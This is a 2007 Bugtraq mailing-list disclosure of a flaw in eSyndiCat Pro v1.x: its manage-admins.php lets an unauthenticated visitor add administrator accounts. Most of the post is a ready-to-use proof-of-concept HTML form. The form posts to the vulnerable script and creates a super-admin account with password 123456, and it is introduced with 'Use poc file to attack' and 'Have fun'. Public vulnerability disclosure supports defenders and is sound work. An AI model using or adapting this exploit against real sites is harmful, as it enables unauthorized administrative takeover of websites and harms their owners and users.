eSyndiCat Input Validation Error Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: eSyndiCat Input Validation Error Vulnerability
From: hack2prison@xxxxxxxxx
Date: 18 May 2007 03:28:22 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

eSyndiCat is Directory websystem, a product of eSyndiCat.com
It has security hole allow attackers get admin and more and more.
Infected version: eSyndiCat Pro v1.x
Infected file: manage-admins.php
Use poc file to attack:

------------------------------------------------
<p>Discovered by H2P - A member of http://vnbrain.net
<form action="http://target/path/admin/manage-admins.php?action=add"; 
method="post">
<table cellspacing="0" cellpadding="0" width="100%" class="striped">
<tr>
        <td width="200"><strong>Admin username:</strong></td>
        <td><input type="text" name="username" size="22" value="checked"/></td>
</tr>
<tr>
        <td><strong>Admin Fullname:</strong></td>
        <td><input type="text" name="fullname" size="22" value="Check 
Only"/></td>
</tr>
<tr>
        <td><strong>Admin Email:</strong></td>
        <td>
        <input type="text" name="email" size="22" 
value="hack2prison@xxxxxxxxxxxxxxx" /></td>
</tr>
<tr>
        <td><strong>Admin password:</strong></td>
        <td><input type="password" name="new_pass" size="22" value="123456" 
/></td>
</tr>
<tr>
        <td><strong>Admin Password Confirmation:</strong></td>
        <td><input type="password" name="new_pass2" size="22" value="123456" 
/></td>
</tr>
<tr>
        <td><strong>Admin Status:</strong></td>
                <td><select name="status">
                        <option value="active" >Active</option>
                        <option value="approval" >Approval</option>             
                </select></td>
</tr>
<tr>
        <td><strong>Submission Notification:</strong></td>
                <td><input type="radio" name="submit_notif" value="1" id="lsn1" 
checked="checked" /><label for="lsn1">Enabled</label>
                <input type="radio" name="submit_notif" value="0" id="lsn0" 
/><label for="lsn0">Disabled</label>
        </td>
</tr>
<tr>
        <td><strong>Payment Notification:</strong></td>
                
        <td><input type="radio" name="payment_notif" value="1" id="lpn1" 
checked="checked" /><label for="lpn1">Enabled</label>
                <input type="radio" name="payment_notif" value="0" id="lpn0" 
/><label for="lpn0">Disabled</label>
        </td>
</tr>
        
<tr>
        <td class="caption" colspan="2"><strong>Admin Permissions</strong></td>
</tr>
<tr>
        <td><strong>Super Admin:</strong></td>
                        <td><input type="radio" name="super" value="1" 
id="type1" checked="checked" 
onclick="javascript:document.getElementById('permissions').style.display='none';"
 /><label for="type1">Enabled</label>
                <input type="radio" name="super" value="0" id="type0"  
onclick="javascript:document.getElementById('permissions').style.display='block';"/><label
 for="type0">Disabled</label>
        </td>
</tr>
</table>

<table cellspacing="0" width="100%">
<tr class="all">
        <td colspan="2"><input type="submit" name="save" value="Save Changes" />
                <input type="hidden" name="id" value="" />
                <input type="hidden" name="action" value="add" />
        </td>
</tr>
</table>
</form>
------------------------------------------------

Have fun

Prev by Date: rPSA-2007-0104-1 idle python
Next by Date: Re: Apple Safari on MacOSX may reveal user's saved passwords
Previous by thread: rPSA-2007-0104-1 idle python
Next by thread: Predictable TCP ISN in Packeteer PacketShaper
Index(es):
- Date
- Thread